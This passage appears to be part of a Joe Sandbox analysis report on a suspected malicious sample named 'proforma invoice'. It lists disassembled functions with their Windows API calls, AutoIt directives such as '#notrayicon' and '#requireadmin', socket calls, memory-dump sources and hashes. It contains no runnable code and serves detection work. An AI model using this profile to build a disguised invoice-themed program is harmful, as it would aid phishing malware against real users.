                  • Instruction ID: a6b6bd5a3c21b4808a24be65918b4e207cc90b73be098e1057cc0bc476d3b6a2
                  • Opcode Fuzzy Hash: e6f6d05b97cf3a773d8c0821cafea4e367f7346507f69f92f8aeffc6f9c14199
                  • Instruction Fuzzy Hash: F5418E312043019FD720DF25D885B5ABFE4EF85360F148B9DF9A5972D2DB30A904CB66
                  Function 00B34416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                  Download Yara Rule
                  APIs
                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00B3CC08,00000000,?,?,?,?), ref: 00B344AA
                  • GetWindowLongW.USER32 ref: 00B344C7
                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00B344D7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Window$Long
                  • String ID: SysTreeView32
                  • API String ID: 847901565-1698111956
                  • Opcode ID: 3b97133095614dec1498e9ae1cf71a88c30836c924ca0a0054bfe3126cfa12ee
                  • Instruction ID: a6ae8271684213eb9a162112d64250ccbfd13840d0c099dc2cdba9bb95fd6ee4
                  • Opcode Fuzzy Hash: 3b97133095614dec1498e9ae1cf71a88c30836c924ca0a0054bfe3126cfa12ee
                  • Instruction Fuzzy Hash: 29317A32210605ABDB209E78DC45BEA7BA9EB09324F314765F979A32E1DB70EC509B50
                  Function 00B2304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00B2335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00B23077,?,?), ref: 00B23378
                  • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00B2307A
                  • _wcslen.LIBCMT ref: 00B2309B
                  • htons.WSOCK32(00000000,?,?,00000000), ref: 00B23106
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                  • String ID: 255.255.255.255
                  • API String ID: 946324512-2422070025
                  • Opcode ID: 90a009e40daaf348951560aeeea3cb39e1ebbb6150eae2b12b0ac4ecb6db92f1
                  • Instruction ID: 00e8e479f67fac034b68db2fcf4ebfb100984c38b5561a377fb99da998882f8d
                  • Opcode Fuzzy Hash: 90a009e40daaf348951560aeeea3cb39e1ebbb6150eae2b12b0ac4ecb6db92f1
                  • Instruction Fuzzy Hash: C131F3392002219FCB10CF68D586FAA77E0EF14718F248099E8199B392CB3AEF41C770
                  Function 00B33EB8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                  Download Yara Rule
                  APIs
                  • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00B33F40
                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00B33F54
                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00B33F78
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: MessageSend$Window
                  • String ID: SysMonthCal32
                  • API String ID: 2326795674-1439706946
                  • Opcode ID: 1c6b098c9821674f239b2e5d1773c190fece5ec5e63e2015e722462f942e8717
                  • Instruction ID: 26663118620a4d58a8ac7184e48e7ea0e2c5839b3867567054f64fd1713ead9f
                  • Opcode Fuzzy Hash: 1c6b098c9821674f239b2e5d1773c190fece5ec5e63e2015e722462f942e8717
                  • Instruction Fuzzy Hash: 19219F32600219BBDF219F94DC46FEB3BB9EB48714F210254FA157B1D0DAB5A9908BA0
                  Function 00B34653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON
                  Download Yara Rule
                  APIs
                  • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00B34705
                  • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00B34713
                  • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00B3471A
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: MessageSend$DestroyWindow
                  • String ID: msctls_updown32
                  • API String ID: 4014797782-2298589950
                  • Opcode ID: 5f09a37cf29e9105cebd25b24352c8a863b182c88fb63cfa9b442ced9c2382ef
                  • Instruction ID: 2e815d4b9ed2d0562351274e688b4677be74f74a5424f697d2a4cdaef2dfe3d9
                  • Opcode Fuzzy Hash: 5f09a37cf29e9105cebd25b24352c8a863b182c88fb63cfa9b442ced9c2382ef
                  • Instruction Fuzzy Hash: 08214CB5600208AFDB10DF68DC81DAA37EDEB5A3A4B140499FA059B291CB70FC52CA60
                  Function 00B095AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: _wcslen
                  • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                  • API String ID: 176396367-2734436370
                  • Opcode ID: b52de795a9a8e7b6bf565ddf81a8c403db3ac147f5bde08cb8df6e0017b6a153
                  • Instruction ID: 49f23dc81f8686a6fc344ffdea7b474c6cfbbb85b2bec0650d46455f8baf50ed
                  • Opcode Fuzzy Hash: b52de795a9a8e7b6bf565ddf81a8c403db3ac147f5bde08cb8df6e0017b6a153
                  • Instruction Fuzzy Hash: B02157722046116AD331BB259D42FBBBBD8EFA5300F14406AF949970C3EB66ED41C3D5
                  Function 00B337B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                  Download Yara Rule
                  APIs
                  • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00B33840
                  • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00B33850
                  • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00B33876
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: MessageSend$MoveWindow
                  • String ID: Listbox
                  • API String ID: 3315199576-2633736733
                  • Opcode ID: 2112801a539cdb9e4d5cbe19b0ca1418a930435dc3b23b4419dcd9986a877fd1
                  • Instruction ID: b0a9ee486d5003ea2cec3daa219ec71a0c0f8276e6cc521e0d1931f7a0075eec
                  • Opcode Fuzzy Hash: 2112801a539cdb9e4d5cbe19b0ca1418a930435dc3b23b4419dcd9986a877fd1
                  • Instruction Fuzzy Hash: 0A21A472610218BBEF218F54DC85FBB37EEEF89B54F218154F9059B190CA71DC5287A0
                  Function 00B149F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                  Download Yara Rule
                  APIs
                  • SetErrorMode.KERNEL32(00000001), ref: 00B14A08
                  • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00B14A5C
                  • SetErrorMode.KERNEL32(00000000,?,?,00B3CC08), ref: 00B14AD0
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ErrorMode$InformationVolume
                  • String ID: %lu
                  • API String ID: 2507767853-685833217
                  • Opcode ID: ad8ce5dfd99672438e667a9fb036fd3a118637981aae1b03ca3b480c8fba20d7
                  • Instruction ID: 1447aaa2aa708bdca3bfd3dc56399def61ea26b820e69b992986dca5b828122e
                  • Opcode Fuzzy Hash: ad8ce5dfd99672438e667a9fb036fd3a118637981aae1b03ca3b480c8fba20d7
                  • Instruction Fuzzy Hash: 09316575A00109AFD710DF54C985EAEBBF8EF09318F148095F509EB262DB71ED45CB61
                  Function 00B341EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                  Download Yara Rule
                  APIs
                  • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00B3424F
                  • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00B34264
                  • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00B34271
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: MessageSend
                  • String ID: msctls_trackbar32
                  • API String ID: 3850602802-1010561917
                  • Opcode ID: 8781df4b4f7c05d5d42453fb9d0d912892bbba8e32bd7d287d740a031ef7ece9
                  • Instruction ID: 48f35ef448706b0fed6d969a13451bece13363efba99369aeb4a35183aae39e9
                  • Opcode Fuzzy Hash: 8781df4b4f7c05d5d42453fb9d0d912892bbba8e32bd7d287d740a031ef7ece9
                  • Instruction Fuzzy Hash: 6D119E31250248BEEF205E69CC46FAB3BECEB95B64F214524FA55E60A0D671E8519B20
                  Function 00B02F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00AA6B57: _wcslen.LIBCMT ref: 00AA6B6A
                    • Part of subcall function 00B02DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00B02DC5
                    • Part of subcall function 00B02DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B02DD6
                    • Part of subcall function 00B02DA7: GetCurrentThreadId.KERNEL32 ref: 00B02DDD
                    • Part of subcall function 00B02DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00B02DE4
                  • GetFocus.USER32 ref: 00B02F78
                    • Part of subcall function 00B02DEE: GetParent.USER32(00000000), ref: 00B02DF9
                  • GetClassNameW.USER32(?,?,00000100), ref: 00B02FC3
                  • EnumChildWindows.USER32(?,00B0303B), ref: 00B02FEB
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                  • String ID: %s%d
                  • API String ID: 1272988791-1110647743
                  • Opcode ID: cd3b5e3f3448e9616aafd2b04ab3d5a4da59151f778f63777a925cafb48f4191
                  • Instruction ID: c7487b750f10b20e313aea07aa0f158331cc09a25511bcd4d21883ea8e1f4953
                  • Opcode Fuzzy Hash: cd3b5e3f3448e9616aafd2b04ab3d5a4da59151f778f63777a925cafb48f4191
                  • Instruction Fuzzy Hash: 8111A2716002056BDF157FA48D8AFED7BEEAF84304F1440B9F909AB1D2DE3099498B70
                  Function 00B35882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                  Download Yara Rule
                  APIs
                  • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00B358C1
                  • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00B358EE
                  • DrawMenuBar.USER32(?), ref: 00B358FD
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Menu$InfoItem$Draw
                  • String ID: 0
                  • API String ID: 3227129158-4108050209
                  • Opcode ID: ce4e2edc01f79382dfb0fec5f422dcc7cfa1b415340a13f0e0f144c023705b14
                  • Instruction ID: 7bb82e104463b28752491e38a6aa6c01701ec2aec429442bd868a5a4684bdd50
                  • Opcode Fuzzy Hash: ce4e2edc01f79382dfb0fec5f422dcc7cfa1b415340a13f0e0f144c023705b14
                  • Instruction Fuzzy Hash: CE012D31500218EFDB219F51DC85BEEBBB9FB45361F2480D9E849D6251DB309A94EF31
                  Function 00B0007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5770f61f7d5c910dde0dc6a70c425a9cfbcd4b7c9d5809f0455f20a5ba8048b5
                  • Instruction ID: 1d984fb823ecd9b972eb288014b59259ecf6dc4f349f0b03f52d86de6a809bb9
                  • Opcode Fuzzy Hash: 5770f61f7d5c910dde0dc6a70c425a9cfbcd4b7c9d5809f0455f20a5ba8048b5
                  • Instruction Fuzzy Hash: 71C13775A1020AEFDB15DFA4C894BAEBBB5FF48304F208598E505EB291D731EE41CB94
                  Function 00AD3E80 Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: __alldvrm$_strrchr
                  • String ID:
                  • API String ID: 1036877536-0
                  • Opcode ID: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
                  • Instruction ID: 74e734fc262ba0004de3aa167af007f5ad8203de4d5f6eeb3d8ad998a110cc7c
                  • Opcode Fuzzy Hash: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
                  • Instruction Fuzzy Hash: A4A13772D003869FEB25CF18C8917AEBBF5EF69350F18426FE5969B381C2388941C751
                  Function 00B2342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Variant$ClearInitInitializeUninitialize
                  • String ID:
                  • API String ID: 1998397398-0
                  • Opcode ID: 7d878010d71d1dad6f9afa94170bd2ed5043adbdc5c98d17930aef6a35cf36e8
                  • Instruction ID: 5f5e3fae79927ed006117f5ff4b5f48b41f373a8692586551b08cde933ffe858
                  • Opcode Fuzzy Hash: 7d878010d71d1dad6f9afa94170bd2ed5043adbdc5c98d17930aef6a35cf36e8
                  • Instruction Fuzzy Hash: D5A16D756043119FC700EF24D985A2EB7E5FF89714F048899F98A9B3A2DB34EE01CB91
                  Function 00B00436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                  Download Yara Rule
                  APIs
                  • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00B3FC08,?), ref: 00B005F0
                  • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00B3FC08,?), ref: 00B00608
                  • CLSIDFromProgID.OLE32(?,?,00000000,00B3CC40,000000FF,?,00000000,00000800,00000000,?,00B3FC08,?), ref: 00B0062D
                  • _memcmp.LIBVCRUNTIME ref: 00B0064E
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: FromProg$FreeTask_memcmp
                  • String ID:
                  • API String ID: 314563124-0
                  • Opcode ID: d176e47009348dcbbb2243b8e8c2a4cee34fdaaf30de3e348bb2dd8f14e85689
                  • Instruction ID: 888a84b7355de5a58fd8cbaaa89bc4b9bf365f4c9948778ae298656a71923c6d
                  • Opcode Fuzzy Hash: d176e47009348dcbbb2243b8e8c2a4cee34fdaaf30de3e348bb2dd8f14e85689
                  • Instruction Fuzzy Hash: B781EE75A10109EFCB04DF94C984EEEBBF9FF89315F204598E516AB290DB71AE05CB60
                  Function 00AE1391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: _free
                  • String ID:
                  • API String ID: 269201875-0
                  • Opcode ID: 6fb518712003663e6bd011f6a93b868853baa288a6e0c39d7aa6e686b5d7bdc9
                  • Instruction ID: 56d23e42f2474cee3c0db800be2c7658a5719a0ddae2eb282c1341b7eba3b5f6
                  • Opcode Fuzzy Hash: 6fb518712003663e6bd011f6a93b868853baa288a6e0c39d7aa6e686b5d7bdc9
                  • Instruction Fuzzy Hash: DF415CB1A00561ABDB216BBA8D45BBE3AF5EF41330F15422AF41AD73D2E63488419361
                  Function 00B36278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                  Download Yara Rule
                  APIs
                  • GetWindowRect.USER32(014FE718,?), ref: 00B362E2
                  • ScreenToClient.USER32(?,?), ref: 00B36315
                  • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00B36382
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Window$ClientMoveRectScreen
                  • String ID:
                  • API String ID: 3880355969-0
                  • Opcode ID: 51f874f72453d59638f77eeca9508354d002695b8aedd4a0430847dffa99af07
                  • Instruction ID: c2df02068af4e2a5099a4dfd91394345eedcf07d2e2543535ba2db1f031dd985
                  • Opcode Fuzzy Hash: 51f874f72453d59638f77eeca9508354d002695b8aedd4a0430847dffa99af07
                  • Instruction Fuzzy Hash: 74512A75A00209EFCB14DF68D881AAE7BF5EB45360F208599F9559B2A0DB30ED81CB50
                  Function 00B21AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
                  Download Yara Rule
                  APIs
                  • socket.WSOCK32(00000002,00000002,00000011), ref: 00B21AFD
                  • WSAGetLastError.WSOCK32 ref: 00B21B0B
                  • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00B21B8A
                  • WSAGetLastError.WSOCK32 ref: 00B21B94
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ErrorLast$socket
                  • String ID:
                  • API String ID: 1881357543-0
